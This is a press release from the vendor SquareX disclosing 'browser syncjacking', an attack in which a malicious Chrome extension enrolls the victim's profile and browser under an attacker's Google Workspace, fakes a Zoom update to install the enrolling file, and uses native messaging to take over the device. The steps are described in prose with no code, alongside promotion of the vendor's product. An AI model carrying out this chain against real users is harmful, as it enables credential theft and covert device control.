The attack begins with an employee installing any browser extension – this could involve publishing one that masquerades as an AI tool or taking over existing popular extensions that may have up to millions of installations in aggregate. The extension then “silently” authenticates the victim into a Chrome profile managed by the attacker’s Google Workspace. This is all done in an automated manner in a background window, making the whole process almost imperceptible to the victim. Once this authentication occurs, the attacker has full control over the newly managed profile in the victim’s browser, allowing them to push automated policies such as disabling safe browsing and other security features.

Using a very clever social engineering attack that exploits trusted domains, the adversary can then further escalate the profile hijacking attack to steal passwords from the victim’s browser. For example, the malicious extension can open and modify Google’s official support page on how to sync user accounts to prompt the victim to perform the sync with just a few clicks. Once the profile is synced, attackers have full access to all credentials and browsing history stored locally. As this attack only leverages legitimate sites and has no visible sign that it has been modified by the extension, it will not trigger any alarm bells in any security solutions monitoring the network traffic.

Browser Takeover

To achieve a full browser takeover, the attacker essentially needs to convert the victim’s Chrome browser into a managed browser. The same extension monitors and intercepts a legitimate download, such as a Zoom update, and replaces it with the attacker’s executable, which contains an enrollment token and registry entry to turn the victim’s Chrome browser into a managed browser. Thinking that they downloaded a Zoom updater, the victim executes the file, which ends up installing a registry entry that instructs the browser to become managed by the attacker’s Google Workspace. This allows the attacker to gain full control over the victim’s browser to disable security features, install additional malicious extensions, exfiltrate data and even silently redirect users to phishing sites. This attack is extremely potent as there is no visual difference between a managed and unmanaged browser. For a regular user, there is no telltale sign that a privilege escalation has occurred unless the victim is highly security aware and goes out of their way to regularly inspect their browser settings and look for associations with an unfamiliar Google Workspace account.

Device Hijacking

With the same downloaded file above, the attacker can additionally insert registry entries required for the malicious extension to message native apps. This allows the extension to directly interact with local apps without further authentication. Once the connection is established, attackers can use the extension in conjunction with the local shell and other available native applications to secretly turn on the device camera, capture audio, record screens and install malicious software – essentially providing full access to all applications and confidential data on the device.

The browser syncjacking attack exposes a fundamental flaw in the way remote-managed profiles and browsers are managed. Today, anyone can create a managed workspace account tied to a new domain and a browser extension without any form of identity verification, making it impossible to attribute these attacks. Unfortunately, most enterprises currently have zero visibility into the browser – most do not have managed browsers or profiles, nor any visibility to the extensions employees are installing often based on trending tools and social media recommendations.

What makes this attack particularly dangerous is that it operates with minimal permissions and nearly no user interaction, requiring only a subtle social engineering step using trusted websites – making it almost impossible for employees to detect. While recent incidents like the Cyberhaven breach have already compromised hundreds, if not thousands of organizations, those attacks required relatively complex social engineering to operate. The devastatingly subtle nature of this attack – with an extremely low threshold of user interaction – not only makes this attack extremely potent, but also sheds light on the terrifying possibility that adversaries are already using this technique to compromise enterprises today.

Unless an organization chooses to completely block browser extensions via managed browsers, the browser syncjacking attack will completely bypass existing blacklists and permissions-based policies. SquareX’s founder Vivek Ramachandran says “This research exposes a critical blind spot in enterprise security. Traditional security tools simply can’t see or stop these sophisticated browser-based attacks. What makes this discovery particularly alarming is how it weaponizes seemingly innocent browser extensions into complete device takeover tools, all while flying under the radar of conventional security measures like EDRs and SASE/SSE Secure Web Gateways. A Browser Detection-Response solution isn’t just an option anymore – it’s a necessity. Without visibility and control at the browser level, organizations are essentially leaving their front door wide open to attackers. This attack technique demonstrates why security needs to ‘shift up’ to where the threats are actually happening: in the browser itself.”

SquareX has been conducting pioneering security research on browser extensions, including the DEF CON 32 talk Sneaky Extensions: The MV3 Escape Artists that revealed multiple MV3 compliant malicious extensions. This research team was also the first to discover and disclose the OAuth attack on Chrome extension developers one week before the Cyberhaven breach. SquareX was also responsible for the discovery of Last Mile Reassembly attacks, a new class of client-side attacks that exploits architectural flaws and completely bypasses all Secure Web Gateway solutions. Based on this research, SquareX’s industry-first Browser Detection and Response solution protects enterprises against advanced extension-based attacks including device hijacking attempts by conducting dynamic analysis on all browser extension activity at runtime, providing a risk score to all active extensions across the enterprise and further identifying any attacks that they may be vulnerable to.

For more information about the browser syncjacking attack, additional findings from this research are available at sqrx.com/research.

About SquareX

SquareX helps organizations detect, mitigate and threat-hunt client-side web attacks happening against their users in real time.

SquareX’s industry-first Browser Detection and Response (BDR) solution, takes an attack-focused approach to browser security, ensuring enterprise users are protected against advanced threats like malicious QR Codes, Browser-in-the-Browser phishing, macro-based malware and other web attacks encompassing malicious files, websites, scripts, and compromised networks.

Additionally, with SquareX, enterprises can provide contractors and remote workers with secure access to internal applications, enterprise SaaS, and convert the browsers on BYOD / unmanaged devices into trusted browsing sessions.

Contact

Head of PR
Junice Liew
SquareX
junice@sqrx.com

The post SquareX Discloses “Browser Syncjacking” , a New Attack Technique that Provides Full Browser and Device Control, Putting Millions at Risk appeared first on Cybersecurity Insiders.